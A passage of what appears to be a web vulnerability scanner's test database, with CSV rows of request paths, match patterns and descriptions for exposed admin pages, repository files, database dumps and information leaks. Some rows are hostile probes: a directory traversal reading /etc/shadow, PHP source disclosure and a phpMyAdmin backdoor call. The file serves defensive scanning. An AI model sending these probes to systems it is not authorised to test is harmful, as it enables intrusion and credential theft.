traversal\",\"\",\"\"\n\"006523\",\"0\",\"38\",\"/?-s\",\"GET\",\"\\\">\\&lt\\;\\?php\",\"<\\?php\",\"\",\"\",\"\",\"PHP allows retrieval of the source code via the -s parameter, and may allow command execution. See http://www.kb.cert.org/vuls/id/520827\",\"\",\"\"\n\"006524\",\"0\",\"38\",\"/login.php?-s\",\"GET\",\"\\\">\\&lt\\;\\?php\",\"<\\?php\",\"\",\"\",\"\",\"PHP allows retrieval of the source code via the -s parameter, and may allow command execution. See http://www.kb.cert.org/vuls/id/520827\",\"\",\"\"\n\"006525\",\"0\",\"b\",\"@TOMCATADMINhtml\",\"GET\",\"<tt>conf\\/tomcat-users\\.xml<\\/tt>\",\"\",\"\",\"\",\"\",\"Default Tomcat Manager / Host Manager interface found\",\"\",\"\"\n\"006526\",\"0\",\"b3\",\"/getstatus\",\"GET\",\"License ID:\",\"\",\"\",\"\",\"\",\"Chaos Software V-Ray status information available\",\"\",\"\"\n\"006527\",\"0\",\"b\",\"/platform/\",\"GET\",\"\\.\\.\\/base\\/index\\.jsp\",\"\",\"\",\"\",\"\",\"Platform Management Console found\",\"\",\"\"\n\"006528\",\"3092\",\"123\",\"/.svn/entries\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Subversion Entries file may contain directory listing information.\",\"\",\"\"\n\"006529\",\"3092\",\"123\",\"/.svn/wc.db\",\"GET\",\"_autoindex\",\"\",\"\",\"\",\"\",\"Subversion SQLite DB file may contain directory listing information. See http://pen-testing.sans.org/blog/pen-testing/2012/12/06/all-your-svn-are-belong-to-us\",\"\",\"\"\n\"006530\",\"3092\",\"123\",\"/.git/index\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Git Index file may contain directory listing information.\",\"\",\"\"\n\"006531\",\"3092\",\"123\",\"/.hg/dirstate\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Mercurial DirState file may contain directory listing information.\",\"\",\"\"\n\"006532\",\"3092\",\"1\",\"/test.jsp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"006533\",\"3093\",\"1b\",\"/em\",\"GET\",\"Oracle Enterprise Manager\",\"\",\"\",\"\",\"\",\"Oracle Application Server oc4j admin page found.\",\"\",\"\"\n\"006554\",\"3093\",\"1b\",\"/oam/\",\"GET\",\"Oracle Access Manager\",\"\",\"\",\"\",\"\",\"Oracle Applications portal pages found.\",\"\",\"\"\n\"006555\",\"0\",\"7\",\"/help/../../../../../../../../../../../../../../../../etc/shadow\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"TP-Link wireless routers directory traversal. See http://websec.ca/advisories/view/path-traversal-vulnerability-tplink-wdr740\",\"\",\"\"\n\"006556\",\"0\",\"3b\",\"/snoop/\",\"GET\",\"Request Information\",\"\",\"\",\"\",\"\",\"WebSphere snoop servlet information disclosure.\",\"\",\"\"\n\"006557\",\"0\",\"3b\",\"/web-console/ServerInfo.jsp\",\"GET\",\"Version Name\",\"\",\"\",\"\",\"\",\"JBoss Application Server information available .\",\"\",\"\"\n\"006558\",\"0\",\"3b\",\"/otrs/installer.pl\",\"GET\",\"OTRS\\sProject\",\"\",\"\",\"\",\"\",\"OTRS installer application found\",\"\",\"\"\n\"006559\",\"0\",\"3b\",\"/reaction/RSTest.htm\",\"GET\",\"ReAction Server Test Page\",\"\",\"\",\"\",\"\",\"ReAction Server test page is installed, this may reveal environmental information\",\"\",\"\"\n\"006597\",\"0\",\"3b\",\"/WorkArea/version.xml\",\"GET\",\"<installation>\",\"\",\"\",\"\",\"\",\"Ektron CMS version information\",\"\",\"\"\n\"006598\",\"0\",\"23\",\"@WORDPRESSwp-content/debug.log\",\"GET\",\"PHP\\sNotice\",\"PHP\\sWarn\",\"\",\"\",\"\",\"PHP debug log found\",\"\",\"\"\n\"006599\",\"0\",\"23\",\"/mobileadmin/db/MobileAdminDB.sqlite\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"RoveIT Mobile Admin internal database is available for download\",\"\",\"\"\n\"006600\",\"0\",\"b\",\"/mobileadmin/\",\"GET\",\"SolarWinds\\sWorldwide\",\"\",\"\",\"\",\"\",\"RoveIT Mobile Admin internal database is available for download\",\"\",\"\"\n\"006601\",\"0\",\"c\",\"/WorkArea/upload.aspx\",\"GET\",\"EktronJQuery\\.js\",\"\",\"\",\"\",\"\",\"Ektron CMS file uploader. See http://seclists.org/fulldisclosure/2012/Sep/21\",\"\",\"\"\n\"006602\",\"0\",\"c\",\"/WorkArea/Blogs/xmlrpc.aspx\",\"GET\",\"<error>1<\\/error>\",\"\",\"\",\"\",\"\",\"Ektron CMS may be vulnerable to XXE injection. See http://seclists.org/fulldisclosure/2012/Sep/21\",\"\",\"\"\n\"006603\",\"0\",\"1b\",\"/mobileadmin/web/\",\"GET\",\"showLoadingScreen\",\"\",\"\",\"\",\"\",\"RoveIT Mobile Admin Windows login\",\"\",\"\"\n\"006605\",\"0\",\"1b\",\"/mobileadmin/logs/\",\"GET\",\"Directory\\sListing\",\"\",\"\",\"\",\"\",\"RoveIT Mobile logs accessible\",\"\",\"\"\n\"006606\",\"0\",\"1b\",\"/mobileadmin/bin/\",\"GET\",\"Directory\\sListing\",\"\",\"\",\"\",\"\",\"RoveIT Mobile executable dir accessible\",\"\",\"\"\n\"006607\",\"0\",\"3\",\"/mobileadmin/home.cs\",\"GET\",\"Server\\sVersion\",\"\",\"\",\"\",\"\",\"RoveIT Mobile gives a list of a server's Windows domains\",\"\",\"\"\n\"006608\",\"0\",\"8\",\"@PHPMYADMINserver_sync.php?c=phpinfo()\",\"GET\",\"PHP\\sVersion\",\"\",\"\",\"\",\"\",\"phpMyAdmin contains a backdoor which allows remote PHP execution. http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php\",\"\",\"\"\n\"006609\",\"0\",\"23\",\"/.git/HEAD\",\"GET\",\"ref:\\srefs\",\"\",\"\",\"\",\"\",\"Git HEAD file found. Full repo details may be present.\",\"\",\"\"\n\"006610\",\"0\",\"23\",\"/.bzr/branch-format\",\"GET\",\"Bazaar-NG\\smeta\",\"\",\"\",\"\",\"\",\"Bazaar file found. Full repo details may be present.\",\"\",\"\"\n\"006611\",\"0\",\"23\",\"/.hg/requires\",\"GET\",\"revlogv\",\"\",\"\",\"\",\"\",\"Mercurial (HG) file found. Full repo details may be present.\",\"\",\"\"\n\"006612\",\"0\",\"3\",\"/troubleshooting_logs.txt\",\"GET\",\"dhcpd:\",\"\",\"\",\"\",\"\",\"Arris Touchstone log file available without authentication.\",\"\",\"\"\n\"006613\",\"0\",\"23\",\"/caucho-status\",\"GET\",\"Caucho\\sServlet\\sEngine\",\"\",\"\",\"\",\"\",\"Caucho Resin status file present\",\"\",\"\"\n\"006614\",\"0\",\"23\",\"@WORDPRESSwp-content/w3tc/dbcache/\",\"GET\",\"Index\\s[oO]f\\s/\",\"\",\"\",\"\",\"\",\"W3 Total Cache reveals sensitive information. See http://seclists.org/fulldisclosure/2012/Dec/242\",\"\",\"\"\n\"006615\",\"0\",\"b\",\"@WORDPRESSwp-content/plugins/portable-phpmyadmin/wp-pma-mod/\",\"GET\",\"<title>phpMyAdmin\",\"\",\"\",\"\",\"\",\"phpMyAdmin (portable) found.\",\"\",\"\"\n\"006616\",\"0\",\"23\",\"@WORDPRESSwp-content/plugins/portable-phpmyadmin/wp-pma-mod/db_sql.php\",\"GET\",\"browse\\\">Browse\",\"\",\"\",\"\",\"\",\"phpMyAdmin (portable) found which may allow DB access.\",\"\",\"\"\n\"006617\",\"0\",\"23\",\"@WORDPRESSwp-content/uploads/dump.sql\",\"GET\",\"WordPress\\sMySQL\\sdatabase\",\"\",\"\",\"\",\"\",\"A Wordpress MySQL database dump was found.\",\"\",\"\"\n\"006618\",\"0\",\"23\",\"@WORDPRESSwp-content/plugins/pods/sql/dump.sql\",\"GET\",\"CREATE\\sTABLE\",\"INSERT\\sINTO\",\"\",\"\",\"\",\"A Wordpress MySQL database dump was found.\",\"\",\"\"\n\"006619\",\"0\",\"23\",\"@WORDPRESSwp-content/plugins/simplemap/dump.sql\",\"GET\",\"CREATE\\sTABLE\",\"INSERT\\sINTO\",\"\",\"\",\"\",\"A Wordpress MySQL database dump was found.\",\"\",\"\"\n\"006620\",\"0\",\"23\",\"@WORDPRESSwp-content/plugins/simplemap/classes/error_log\",\"GET\",\"PHP\\sFatal\\serror\",\"\",\"\",\"\",\"\",\"Wordpress Simplemap error log found.\",\"\",\"\"\n\"006621\",\"0\",\"23\",\"@WORDPRESSwp-content/plugins/emailbuddy/db.sql\",\"GET\",\"CREATE\\sTABLE\",\"INSERT\\sINTO\",\"\",\"\",\"\",\"A Wordpress MySQL database dump was found.\",\"\",\"\"\n\"006622\",\"0\",\"2\",\"@WORDPRESSwp-content/uploads/\",\"GET\",\"Index\\s[oO]f\\s\",\"\",\"\",\"\",\"\",\"Wordpress uploads directory is browsable. This may reveal sensitive information\",\"\",\"\"\n\"006623\",\"0\",\"23\",\"@WORDPRESSwp-content/uploads/\",\"GET\",\"Index\\s[oO]f\\s\",\"\",\"temp_[a-z0-9]+\",\"\",\"\",\"Wordpress uploads directory is browsable may contain database dumps in the 'temp_*' directory.\",\"\",\"\"\n\"006624\",\"0\",\"23\",\"@WORDPRESSwp-content/plugins/wpmu-dev-post-votes/db.sql\",\"GET\",\"CREATE\\sTABLE\",\"INSERT\\sINTO\",\"\",\"\",\"\",\"A Wordpress MySQL database dump was found.\",\"\",\"\"\n\"006625\",\"0\",\"23\",\"@WORDPRESSwp-content/plugins/wpvotes/db.sql\",\"GET\",\"CREATE\\sTABLE\",\"INSERT\\sINTO\",\"\",\"\",\"\",\"A Wordpress MySQL database dump was found.\",\"\",\"\"\n\"006626\",\"0\",\"23\",\"@WORDPRESSwp-content/plugins/post-voting/db.sql\",\"GET\",\"CREATE\\sTABLE\",\"INSERT\\sINTO\",\"\",\"\",\"\",\"A Wordpress MySQL database dump was found.\",\"\",\"\"\n\"006627\",\"81817\",\"3\",\"/?q[]=x\",\"GET\",\"(trim|explode|preg_match|stristr)\\(\\)\\sexpects\\sparameter\",\"Array\\sto\\sstring\",\"\",\"\",\"\",\"Drupal 7 contains a path information disclosure\",\"\",\"\"\n\"006628\",\"0\",\"3\",\"/whoami.php\",\"GET\",\"php\\sis\\srunning\\sas\",\"\",\"\",\"\",\"\",\"Whoami.php reveals the web server user.\",\"\",\"\"\n\"006629\",\"0\",\"23\",\"/elmah.axd\",\"GET\",\"Error\\sLog\\sfor\",\"Atif\\sAziz\",\"\",\"\",\"\",\"elmah.axd reveals application log details. See http://www.troyhunt.com/2012/01/aspnet-session-hijacking-with-google.html\",\"\",\"\"\n\"006630\",\"0\",\"b\",\"/SAFileUpDocs/whnjs.htm\",\"GET\",\"<title>SoftArtisans FileUp 5\\.0<\\/title>\",\"\",\"\",\"\",\"\",\"SoftArtisans FileUp help documentation found\",\"\",\"\"\n\"006631\",\"0\",\"b\",\"/SAFileUpSamples/\",\"GET\",\"FileUp v5 Code Sample Index\",\"\",\"\",\"\",\"\",\"SoftArtisans FileUp samples found, these may allowed file uploads\",\"\",\"\"\n\"006633\",\"0\",\"3\",\"/cgi-bin/status_cgi\",\"GET\",\"Touchstone\\sStatus\",\"\",\"\",\"\",\"\",\"Arris Touchstone status program reveals potentially sensitive information.\",\"\",\"\"\n\"006634\",\"0\",\"2\",\"/docs/\",\"GET\",\"Apache Tomcat\",\"\",\"<h2>Documentation Index</\\h2>\",\"\",\"\",\"Tomcat Documentation found\",\"\",\"\"\n\"006635\",\"0\",\"013\",\"/sites/all/libraries/tinymce/examples/\",\"GET\",\"example\\susing\\sjQuery\",\"TinyMCE\\sexamples\",\"\",\"\",\"\",\"Drupal install of TinyMCE examples found, check for file uploads.\",\"\",\"\"\n\"006636\",\"0\",\"1\",\"/notes.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"006637\",\"0\",\"1\",\"/httpd.conf\",\"GET\",\"configuration\\sfile\",\"\",\"\",\"\",\"\",\"Apache httpd.conf configuration file\",\"\",\"\"\n\"006638\",\"0\",\"1\",\"/httpd.conf.bak\",\"GET\",\"configuration\\sfile\",\"\",\"\",\"\",\"\",\"Apache httpd.conf configuration file\",\"\",\"\"\n\"006639\",\"0\",\"1\",\"/sites/default/files/backup_migrate/\",\"GET\",\"index\\sof\",\"\",\"\",\"\",\"\",\"Drupal database backups available\",\"\",\"\"\n\"006640\",\"0\",\"1\",\"/sites/default/files/simpletest/verbose/ContentAccessModuleTestCase-2.html\",\"GET\",\"POST\\srequest\\sto\",\"\",\"\",\"\",\"\",\"Drupal simpletest plugin has test cases available, may leak a username/password.\",\"\",\"\"\n\"006641\",\"0\",\"b\",\"/menu/neo\",\"GET\",\"Citrix\\sLogin\",\"\",\"\",\"\",\"\",\"Citrix Access Gateway login page detected.\",\"\",\"\"\n\"006642\",\"0\",\"b\",\"/eprise\",\"GET\",\"SilkRoad\\sEprise\",\"\",\"\",\"\",\"\",\"SilkRoad Eprise CMS login found.\",\"\",\"\"\n\"006643\",\"0\",\"b\",\"/eprise/local/systempages/login/\",\"GET\",\"Eprise:\\sLogin\",\"\",\"\",\"\",\"\",\"SilkRoad Eprise CMS login found.\",\"\",\"\"\n\"006644\",\"0\",\"bd\",\"/eprise/WebServices/\",\"GET\",\"Eprise\\sWeb\\sService\",\"\",\"\",\"\",\"\",\"SilkRoad Eprise WebServices found.\",\"\",\"\"\n\"006645\",\"0\",\"b\",\"/documents/appserver/default.htm\",\"GET\",\"Application\\sServer\\sKnowledge\\sBase\",\"\",\"\",\"\",\"\",\"Agfa Impex Application Server KB found.\",\"\",\"\"\n\"006646\",\"0\",\"b\",\"/documents/default.htm\",\"GET\",\"IMPAX\\sDocumentation\",\"\",\"\",\"\",\"\",\"Agfa Impex Application Server documentation found.\",\"\",\"\"\n\"006647\",\"0\",\"d\",\"/AgfaHC.BackOffice.Web.Services/BackOfficeService.asmx\",\"GET\",\"BackOfficeWebService\\sWeb\\sService\",\"\",\"\",\"\",\"\",\"Agfa Impex WebService\",\"\",\"\"\n\"006648\",\"0\",\"b2\",\"/eprsup/sitegenhelp/content/content.htm\",\"GET\",\"Content\\sCenter\",\"\",\"\",\"\",\"\",\"SilkRoad Eprise documentation.\",\"\",\"\"\n\"006649\",\"0\",\"b2\",\"/eprsup/eWebEditPro2/test.htm\",\"GET\",\"License\\sKeys\",\"\",\"\",\"\",\"\",\"SilkRoad Eprise has Ektron WebEditPro2 installed--test file found.\",\"\",\"\"\n\"006650\",\"0\",\"b2\",\"/eWebEditPro2/test.htm\",\"GET\",\"License\\skeys\",\"\",\"\",\"\",\"\",\"Ektron WebEditPro2 test/sample file found.\",\"\",\"\"\n\"006651\",\"0\",\"b2\",\"/ewebeditpro2/samples/asp/database/index.asp\",\"GET\",\"Ektron\\sWebEditPro\",\"\",\"\",\"\",\"\",\"Ektron WebEditPro2 test/sample file found.\",\"\",\"\"\n\"006652\",\"0\",\"b2\",\"/ewebeditpro2/samples/coldfusion/database/index.cfm\",\"GET\",\"Ektron\\sWebEditPro\",\"\",\"\",\"\",\"\",\"Ektron WebEditPro2 test/sample file found.\",\"\",\"\"\n\"006653\",\"0\",\"b2\",\"/ewebeditpro2/samples/jsp/database/index.jsp\",\"GET\",\"Ektron\\sWebEditPro\",\"\",\"\",\"\",\"\",\"Ektron WebEditPro2 test/sample file found.\",\"\",\"\"\n\"006654\",\"0\",\"b2\",\"/eprsup/ewebeditpro2/samples/asp/database/index.asp\",\"GET\",\"Ektron\\sWebEditPro\",\"\",\"\",\"\",\"\",\"Ektron WebEditPro2 test/sample file found.\",\"\",\"\"\n\"006655\",\"0\",\"b2\",\"/eprsup/ewebeditpro2/samples/coldfusion/database/index.cfm\",\"GET\",\"Ektron\\sWebEditPro\",\"\",\"\",\"\",\"\",\"Ektron WebEditPro2 test/sample file found.\",\"\",\"\"\n\"006656\",\"0\",\"b2\",\"/eprsup/ewebeditpro2/samples/jsp/database/index.jsp\",\"GET\",\"Ektron\\sWebEditPro\",\"\",\"\",\"\",\"\",\"Ektron WebEditPro2 test/sample file found.\",\"\",\"\"\n\"006657\",\"0\",\"b2\",\"/eprsup/ewebeditpro2/samples/php/database/index.php\",\"GET\",\"Ektron\\sWebEditPro\",\"\",\"\",\"\",\"\",\"Ektron WebEditPro2 test/sample file found.\",\"\",\"\"\n\"006658\",\"0\",\"b2\",\"/ewebeditpro2/samples/php/database/index.php\",\"GET\",\"Ektron\\sWebEditPro\",\"\",\"\",\"\",\"\",\"Ektron WebEditPro2 test/sample file found.\",\"\",\"\"\n\"006659\",\"0\",\"2\",\"/eprise/samples/samples2004/content/index.htm\",\"GET\",\"Samples\\sCollection\",\"\",\"\",\"\",\"\",\"SilkRoad Eprise CMS samples found. Functionality may include creating users or uploading files.\",\"\",\"\"\n\"006660\",\"0\",\"2\",\"/eprise/samples/QuickForms/PageFromStyle/CreatePageFromStyle\",\"GET\",\"Into\\sthe\\sFolder\",\"\",\"\",\"\",\"\",\"SilkRoad Eprise CMS create page shows a list of directories on the web site (backend CMS paths).\",\"\",\"\"\n\"006661\",\"3092\",\"b1\",\"/mychart/adminlogin.asp\",\"GET\",\"licensed\\sfrom\\sEpic\",\"\",\"\",\"\",\"\",\"Epic Systems MyChart admin login found\",\"\",\"\"\n\"006662\",\"3092\",\"12\",\"/exception.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"PHP Exceptions File\",\"\",\"\"\n\"006663\",\"3092\",\"b\",\"@MAGENTOinstall.php\",\"GET\",\"Magento\\salready\\sinstalled\",\"\",\"\",\"\",\"\",\"Magento install.php file found.\",\"\",\"\"\n\"006664\",\"0\",\"2b\",\"@MAGENTOdownloader/\",\"GET\",\"Welcome\\sto\\sMagento\",\"\",\"\",\"\",\"\",\"Magento installer found and installation is not complete.\",\"\",\"\"\n\"006665\",\"0\",\"2b\",\"@MAGENTOdownloader.php\",\"GET\",\"Welcome\\sto\\sMagento\",\"\",\"\",\"\",\"\",\"Magento installer found and installation is not complete.\",\"\",\"\"\n\"006666\",\"0\",\"b\",\"@WORDPRESSwp-admin/wp-login.php\",\"GET\",\"Powered\\sby\\sWordPress\",\"\",\"\",\"\",\"\",\"Wordpress login found\",\"\",\"\"\n\"006667\",\"0\",\"b\",\"/blog/wp-login.php\",\"GET\",\"Powered\\sby\\sWordPress\",\"\",\"\",\"\",\"\",\"Wordpress login found\",\"\",\"\"\n\"006668\",\"0\",\"b\",\"@WORDPRESSwp-login.php\",\"GET\",\"Powered\\sby\\sWordPress\",\"\",\"\",\"\",\"\",\"Wordpress login found\",\"\",\"\"\n\"006669\",\"0\",\"2\",\"/adfs/ls/?wa=wsignout1.0\",\"GET\",\"200\",\"method=\\\"post\\\" action=\\\"/adfs/ls/?wa=wsignout1\\.0\\\" id=\\\"aspnetForm\\\"\",\"\",\"\",\"\",\"Active Directory Federation Services sign out page found.\",\"\",\"\"\n\"006670\",\"0\",\"2\",\"/adfs/ls/?wa=wsignin1.0&wtrealm=http://www.cirt.net/\",\"GET\",\"200\",\"method=\\\"post\\\" action=\\\"/adfs/ls/?wa=wsignin1\\.0&wtrealm=http://www\\.cirt\\.net/\\\" id=\\\"aspnetForm\\\"\",\"\",\"\",\"\",\"Active Directory Federation Services sign in page found.\",\"\",\"\"\n\"006672\",\"3092\",\"b\",\"@PHPMYADMINDocumentation.html\",\"GET\",\"phpMyAdmin .* Documentation\",\"\",\"200\",\"\",\"\",\"phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.\",\"\",\"\"\n\"006673\",\"89282\",\"0\",\"@FCKEDITOR_whatsnew.html\",\"GET\",\"Version\\s2\\.(?:6\\.[0-8]|5\\.\\d+)<\",\"\",\"\",\"\",\"\",\"FCKEditor versions below 2.6.9 allow file upload restriction bypasses, see http://soroush.secproject.com/blog/2012/11/file-in-the-hole/\",\"\",\"\"\n\"006674\",\"0\",\"3\",\"/apc.php\",\"GET\",\"APC\\sINFO\",\"APCu\\sINFO\",\"\",\"\",\"\",\"APC/APCu Opcode Cache for PHP information script found\",\"\",\"\"\n\"006675\",\"0\",\"b\",\"@TOMCATADMINhtml\",\"GET\",\"401\",\"\",\"\",\"\",\"\",\"Tomcat Manager / Host Manager interface found (pass protected)\",\"\",\"\"\n\"006676\",\"96181\",\"2\",\"/adfs/services/proxytrustpolicystoretransfer\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006677\",\"96181\",\"2\",\"/adfs/fs/federationserverservice.asmx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006678\",\"96181\",\"2\",\"/adfs/services/trust/samlprotocol/proxytrust\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006679\",\"96181\",\"2\",\"/adfs/services/trust/mexsoap\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006680\",\"96181\",\"2\",\"/adfs/services/trust/proxymexhttpget/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006681\",\"96181\",\"2\",\"/adfs/services/trust/proxymex\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006683\",\"96181\",\"2\",\"/adfs/services/trust/2005/windowstransport\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006684\",\"96181\",\"2\",\"/adfs/services/trust/2005/certificatemixed\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006685\",\"96181\",\"2\",\"/adfs/services/trust/2005/certificatetransport\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006686\",\"96181\",\"2\",\"/adfs/services/trust/2005/usernamemixed\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006687\",\"96181\",\"2\",\"/adfs/services/trust/2005/kerberosmixed\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006688\",\"96181\",\"2\",\"/adfs/services/trust/2005/issuedtokenmixedasymmetricbasic256\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006689\",\"96181\",\"2\",\"/adfs/services/trust/2005/issuedtokenmixedsymmetricbasic256\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006690\",\"96181\",\"2\",\"/adfs/services/trust/13/kerberosmixed\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006691\",\"96181\",\"2\",\"/adfs/services/trust/13/certificatemixed\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006692\",\"96181\",\"2\",\"/adfs/services/trust/13/usernamemixed\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006693\",\"96181\",\"2\",\"/adfs/services/trust/13/issuedtokenmixedasymmetricbasic256\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006694\",\"96181\",\"2\",\"/adfs/services/trust/13/issuedtokenmixedsymmetricbasic256\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006695\",\"96181\",\"2\",\"/adfs/services/trusttcp/windows\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006696\",\"96181\",\"2\",\"/adfs/services/trust/proxytrust\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006697\",\"96181\",\"2\",\"/adfs/services/trust/proxytrust13\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006698\",\"96181\",\"2\",\"/adfs/services/trust/proxytrustprovisionusername\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006699\",\"96181\",\"2\",\"/adfs/services/trust/proxytrustprovisionissuedtoken\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006700\",\"96181\",\"2\",\"/FederationMetadata/2007-06/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006701\",\"96181\",\"2\",\"/Federationmetadata/2007-06/FederationMetadata.xml\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006702\",\"96181\",\"2\",\"/adfs/ls/IdpInitiatedSignon.aspx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006703\",\"0\",\"1e\",\"/console/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Application console found\",\"\",\"\"\n\"006704\",\"0\",\"1\",\"/umbraco/login.aspx\",\"GET\",\"umbraco\\.org\",\"\",\"\",\"\",\"\",\"Umbraco admin login page found\",\"\",\"\"\n\"006705\",\"0\",\"13\",\"/aspmenu/_notes/dwsync.xml\",\"GET\",\"file\\sname\",\"\",\"\",\"\",\"\",\"Adobe Dreamweaver dwsync.xml Remote Information Disclosure\",\"\",\"\"\n\"006707\",\"0\",\"be\",\"@AXIS2axis2-admin/\",\"GET\",\"Axis2\\sadministration\\sconsole\",\"\",\"\",\"\",\"\",\"Apache Axis2 administration console found.\",\"\",\"\"\n\"006709\",\"0\",\"b6\",\"/wsman/\",\"GET\",\"200\",\"403\",\"\",\"\",\"\",\"Windows Remote Management is enabled\",\"\",\"\"\n\"006710\",\"0\",\"be\",\"/XMSPortal/\",\"GET\",\"XMS\\sCustomer\\sPortal\",\"\",\"\",\"\",\"\",\"XMS Portal found\",\"\",\"\"\n\"006711\",\"0\",\"27\",\"/desktopmodules/feedbackdesigner/ajaxfbs/browser.html\",\"GET\",\"text\\seditor\",\"\",\"\",\"\",\"\",\"FCKEditor found\",\"\",\"\"\n\"006712\",\"0\",\"20\",\"/desktopmodules/feedbackdesigner/ajaxfbs/frmupload.html\",\"GET\",\"text\\seditor\",\"\",\"\",\"\",\"\",\"FCKEditor file uploader found\",\"\",\"\"\n\"006713\",\"0\",\"13\",\"/fantastico_fileslist.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"fantastico_fileslist.txt file found. This file contains a list of all the files from the current directory.\",\"\",\"\"\n\"006714\",\"0\",\"d\",\"/webservices/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Webservices found\",\"\",\"\"\n\"006715\",\"0\",\"be\",\"/atg/bcc\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Oracle ATG Business Control Center\",\"\",\"\"\n\"006716\",\"0\",\"be\",\"/sqlJmsAdmin/\",\"GET\",\"SQL-JMS\\sAdmin\",\"\",\"\",\"\",\"\",\"Oracle ATG JMS SQL Admin\",\"\",\"\"\n\"006717\",\"0\",\"e\",\"/dyn/admin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin page found; possibly Oracle ATG\",\"\",\"\"\n\"006718\",\"0\",\"e\",\"/pls/apex\",\"GET\",\"Application\\sExpress\\sAdministration\\sServices\",\"\",\"\",\"\",\"\",\"Oracle APEX admin found\",\"\",\"\"\n\"006719\",\"0\",\"e\",\"/pls/apex_admin\",\"GET\",\"Application\\sExpress\\sAdministration\\sServices\",\"\",\"\",\"\",\"\",\"Oracle APEX admin found\",\"\",\"\"\n\"006720\",\"0\",\"23\",\"/_layouts/userdisp.aspx\",\"GET\",\"User\\sinformation\",\"\",\"\",\"\",\"\",\"Sharepoint discloses user information\",\"\",\"\"\n\"006721\",\"0\",\"23\",\"/_layouts/aclinv.aspx\",\"GET\",\"Add\\sUsers\",\"\",\"\",\"\",\"\",\"Sharepoint discloses user information\",\"\",\"\"\n\"006722\",\"0\",\"23\",\"/_layouts/associatedgroups.aspx\",\"GET\",\"Edit\\sGroup\",\"\",\"\",\"\",\"\",\"Sharepoint discloses user information\",\"\",\"\"\n\"006723\",\"0\",\"23\",\"/_layouts/groups.aspx\",\"GET\",\"People\\sand\\sGroups\",\"\",\"\",\"\",\"\",\"Sharepoint discloses user information\",\"\",\"\"\n\"006724\",\"0\",\"23\",\"/_layouts/people.aspx\",\"GET\",\"People\\sand\\sGroups\",\"\",\"\",\"\",\"\",\"Sharepoint discloses user information\",\"\",\"\"\n\"006726\",\"0\",\"23\",\"/_layouts/viewgrouppermissions.aspx\",\"GET\",\"The\\squery\\sstring\",\"\",\"\",\"\",\"\",\"Sharepoint discloses user information\",\"\",\"\"\n\"006727\",\"0\",\"23\",\"/_vti_bin/spdisco.aspx\",\"GET\",\"<discovery\\s\",\"\",\"\",\"\",\"\",\"Sharepoint discloses WSDL information via this XML\",\"\",\"\"\n\"006728\",\"0\",\"e\",\"/crx\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Adobe CQ CRX Console\",\"\",\"\"\n\"006729\",\"0\",\"e\",\"/system/console/configMgr\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"OSGi Apache Felix 